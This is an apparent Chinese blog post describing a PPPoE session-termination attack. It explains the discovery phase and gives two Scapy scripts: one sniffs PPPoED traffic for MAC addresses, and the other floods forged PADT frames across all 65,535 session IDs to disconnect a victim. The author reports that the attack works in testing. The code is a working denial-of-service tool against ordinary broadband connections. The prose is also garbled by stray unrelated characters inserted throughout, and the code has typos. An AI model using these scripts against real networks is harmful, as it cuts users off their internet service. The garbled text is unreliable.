PPPoE攻擊:PADT斷開(kāi)連接

PPPoE協(xié)議是一個(gè)非常良好的協(xié)議贮泞,它具有帶寬控制、用戶(hù)認(rèn)證幔烛、防ARP病毒等功能啃擦,基本上可以滿足網(wǎng)絡(luò)人員對(duì)用戶(hù)的管理,多用于adsl撥號(hào)饿悬,許多運(yùn)行商就是通過(guò)pppoe撥號(hào)對(duì)用戶(hù)實(shí)現(xiàn)寬帶接入

本人在使用PPPoE協(xié)議過(guò)程中议惰,對(duì)PPPoE協(xié)議進(jìn)行了學(xué)習(xí),發(fā)現(xiàn)PPPoE有一些不足乡恕,研究如下

PPPoE認(rèn)證分為兩個(gè)階段:

第一階段:發(fā)現(xiàn)階段

  1. pppoe client廣播發(fā)送PADI數(shù)據(jù)包建立連接
  2. pppoe server回復(fù)一個(gè)PADO單播幀
  3. client回復(fù)一個(gè)PADR單播請(qǐng)求,期望進(jìn)行會(huì)話
  4. pppoe server回復(fù)一個(gè)PADS數(shù)據(jù)包俯萎,同意進(jìn)行下一步協(xié)商(包中攜帶一個(gè)sessionid傲宜,作為用戶(hù)的憑證之一)

第二階斷:會(huì)話階段
雙方使用PPP的LCP協(xié)議協(xié)商鏈路,NCP進(jìn)行用戶(hù)名密碼檢驗(yàn)夫啊,雙方完成通訊


在第一階段pppoe會(huì)話重要依據(jù)就是雙方的mac地址函卒,在和sessionid

在用戶(hù)下線的時(shí)候,用戶(hù)會(huì)發(fā)送PADT數(shù)據(jù)包進(jìn)行協(xié)商撇眯,斷開(kāi)會(huì)話連接

那么問(wèn)題來(lái)了:如果我們冒充服務(wù)器(客戶(hù))报嵌,向客戶(hù)(服務(wù)器)發(fā)送偽造的特定格式的PADT數(shù)據(jù)包虱咧,會(huì)不會(huì)斷開(kāi)會(huì)話?基于這一思路锚国,我利用python的scapy模塊寫(xiě)出了一個(gè)程序腕巡,經(jīng)過(guò)測(cè)試,這個(gè)思路完全正確血筑,可以達(dá)到斷開(kāi)會(huì)話的目的

攻擊的原理:在pppoe client發(fā)送廣播幀發(fā)送discovery時(shí),監(jiān)聽(tīng)網(wǎng)絡(luò)绘沉,得到client mac地址,再對(duì)client發(fā)送一個(gè)PADT數(shù)據(jù)包豺总,包中包含sessionid车伞,這時(shí)就可以使client誤以為server結(jié)束了連接。注意:在發(fā)送病毒幀時(shí)喻喳,雙方應(yīng)該已經(jīng)完成了第一階段的會(huì)話

由于我們不清楚客戶(hù)獲得的sessionid另玖,所以對(duì)于sessionid的取值直接使用了數(shù)據(jù)字典,因此為了破壞連接必須發(fā)送65535個(gè)數(shù)據(jù)包表伦,所需時(shí)間較長(zhǎng)

攻擊的python代碼如下:

這段代碼可以獲得PPPoE服務(wù)器的mac地址
from scapy.all  import *
from struct import *
import threading

def packet(code=0x09,len=12,macadd='ff:ff:ff:ff:ff:ff'):
    a=Ether()/PPPoE()/Raw()
    a.dst=macadd
    a.type=0x8863
    a.payload.version=1
    a.payload.type=1
    a.payload.code=code
    a.payload.len=len
    a.payload.payload.load=pack("12B",0x01,0x01,0,0,0x01,0x03,0,0x04,0x25,0x1d,0,0)
    return a

def sniffPPPoE():
    c=sniff(filter='pppoed',count=2)
    c[1].show()

t = threading.Thread(target=sniffPPPoE)

if __name__ == '__main__':
    t.start()
    time.sleep(1)
    sendp(packet(code=0x09))
這段代碼可以斷開(kāi)連接谦去,src地址需修改,為服務(wù)器mac地址绑榴,可由上面程序獲得
rom  scapy.all import *

a=sniff(filter='pppoed',count=1)
time.sleep(3)
for i in range(65535):
    c=Ether()/PPPoE()
    c.dst=a[0].src
    c.src="00:0c:29:1e:c1:3a"
    c.type=0x8863
    c.payload.code=0xa7
    c.payload.sessionid=i
    c.payload.len=0
    sendp(c)
    print "send session:"+str(i)
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末哪轿,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子翔怎,更是在濱河造成了極大的恐慌窃诉,老刑警劉巖,帶你破解...
    沈念sama閱讀 206,723評(píng)論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件赤套,死亡現(xiàn)場(chǎng)離奇詭異飘痛,居然都是意外死亡,警方通過(guò)查閱死者的電腦和手機(jī)容握,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,485評(píng)論 2 382
  • 文/潘曉璐 我一進(jìn)店門(mén)宣脉,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái),“玉大人剔氏,你說(shuō)我怎么就攤上這事塑猖。” “怎么了谈跛?”我有些...
    開(kāi)封第一講書(shū)人閱讀 152,998評(píng)論 0 344
  • 文/不壞的土叔 我叫張陵羊苟,是天一觀的道長(zhǎng)。 經(jīng)常有香客問(wèn)我感憾,道長(zhǎng)蜡励,這世上最難降的妖魔是什么? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 55,323評(píng)論 1 279
  • 正文 為了忘掉前任,我火速辦了婚禮凉倚,結(jié)果婚禮上兼都,老公的妹妹穿的比我還像新娘。我一直安慰自己稽寒,他們只是感情好扮碧,可當(dāng)我...
    茶點(diǎn)故事閱讀 64,355評(píng)論 5 374
  • 文/花漫 我一把揭開(kāi)白布。 她就那樣靜靜地躺著瓦胎,像睡著了一般芬萍。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上搔啊,一...
    開(kāi)封第一講書(shū)人閱讀 49,079評(píng)論 1 285
  • 那天柬祠,我揣著相機(jī)與錄音,去河邊找鬼负芋。 笑死漫蛔,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的旧蛾。 我是一名探鬼主播莽龟,決...
    沈念sama閱讀 38,389評(píng)論 3 400
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼锨天!你這毒婦竟也來(lái)了毯盈?” 一聲冷哼從身側(cè)響起,我...
    開(kāi)封第一講書(shū)人閱讀 37,019評(píng)論 0 259
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤病袄,失蹤者是張志新(化名)和其女友劉穎搂赋,沒(méi)想到半個(gè)月后,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體益缠,經(jīng)...
    沈念sama閱讀 43,519評(píng)論 1 300
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡脑奠,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 35,971評(píng)論 2 325
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了幅慌。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片宋欺。...
    茶點(diǎn)故事閱讀 38,100評(píng)論 1 333
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖胰伍,靈堂內(nèi)的尸體忽然破棺而出齿诞,到底是詐尸還是另有隱情,我是刑警寧澤骂租,帶...
    沈念sama閱讀 33,738評(píng)論 4 324
  • 正文 年R本政府宣布掌挚,位于F島的核電站,受9級(jí)特大地震影響菩咨,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,293評(píng)論 3 307
  • 文/蒙蒙 一抽米、第九天 我趴在偏房一處隱蔽的房頂上張望特占。 院中可真熱鬧,春花似錦云茸、人聲如沸是目。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 30,289評(píng)論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)懊纳。三九已至,卻和暖如春亡容,著一層夾襖步出監(jiān)牢的瞬間嗤疯,已是汗流浹背。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 31,517評(píng)論 1 262
  • 我被黑心中介騙來(lái)泰國(guó)打工闺兢, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留茂缚,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 45,547評(píng)論 2 354
  • 正文 我出身青樓屋谭,卻偏偏與公主長(zhǎng)得像脚囊,于是被迫代替她去往敵國(guó)和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子桐磁,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 42,834評(píng)論 2 345

推薦閱讀更多精彩內(nèi)容